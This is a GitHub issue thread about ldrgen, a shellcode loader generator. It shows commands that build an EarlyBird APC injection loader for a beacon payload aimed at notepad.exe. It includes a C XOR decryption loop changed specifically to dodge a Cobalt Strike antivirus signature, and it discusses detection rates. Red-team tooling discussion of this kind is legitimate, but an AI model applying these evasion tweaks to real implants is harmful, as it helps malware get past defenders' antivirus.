### ISSUE TITLE
make error

### ISSUE THREAD

**Issue by sec13b** [gatariee/ldrgen#1]
ldrgen-linux-x64 generate --template templates --bin beacon_x64.bin --output implants --loader EarlyBirdAPC_Buffed --enc xor --args "key=2adc118cdd0ae, pname=C:\\\Windows\\\system32\\\notepad.exe"     
cd implants && make x64

the key can be changed ?

also can be generate without  execute the loader in console , like silent 

also is detected detected: 15/26
15/26 - adaware, alyac, avast, avg, avira, bitdef, clam, drweb, nod32, forti, fsecure, kis, mbytes, windef, zonealarm

**Comment by gatariee** [comment]
1. Yes, the key can be changed. The shellcode will be encrypted before being passed into the templating engine (saved to shellcode.bin.enc). https://github.com/gatariee/ldrgen/blob/503783ac19e61eb51ce0366e9a5bead9cdda50de/src/cmd/generator/shellcode.go#L53

2. No, there isn't a setting to disable debug print statements. I'm leaving it up to users to create their own templates, or doing a find & replace on `printf`

3. I took a closer look and found that `Xor.c` compiles to the exact same byte code as Cobalt, weird.
![cobalt](https://i.gyazo.com/943b5e4abe59d558bc0540a55a69da15.png)

I patched this pretty quickly in [503783a](https://github.com/gatariee/ldrgen/commit/503783ac19e61eb51ce0366e9a5bead9cdda50de#diff-8d1f3574d7e8b3b696b7c2fad32b1c22ce5e6d45bc18ebfd8933585160aa6d61) by adding a redundant byte swap operation
```c
for ( size_t i = 0; i < shellcodeSize; ++i ) {
    shellcode[i] ^= key[i % keyLen];
    temp = key[i % keyLen];

    /* Avoid: Trojan:Win64/CobaltStrike.PACZ!MTB */
    temp ^= 0xFF;
    temp ^= 0xFF;

    shellcode[i] ^= temp;
}
```

Anyway, the goal of this project isn't to give evasive loaders out of the box- by the nature of AV, anything posted publicly will eventually be signatured. You may want to look into reading the example templates, and writing your own loaders.

You can also add your own encryption routines, but if it's not XOR (i.e AES, RC4), you'll have to encrypt the shellcode on your own before passing it as a template.

**Comment by gatariee** [comment]
Anyway, I chucked it into VT (I know, I'm lazy and like burning my own loaders) and got 7/72 (https://www.virustotal.com/gui/file/2bd6748df72ae4ef079eeafd66228755f58c45c037dd8c2e18cd691d33d8b863) 

```
.\ldrgen-win64.exe generate --bin ..\..\dev\calc_shellcode\calc.bin  --loader EarlyBirdAPC_buffed --output test --template ..\..\templates\ --args "key=abcdefgaaaaaaaaaaaaaaaaaaaaaaa, pname=C:\\Windows\\system32\\notepad.exe" --enc xor
```
![vt](https://i.gyazo.com/5926715a28eb6a86be628264872b4782.png)
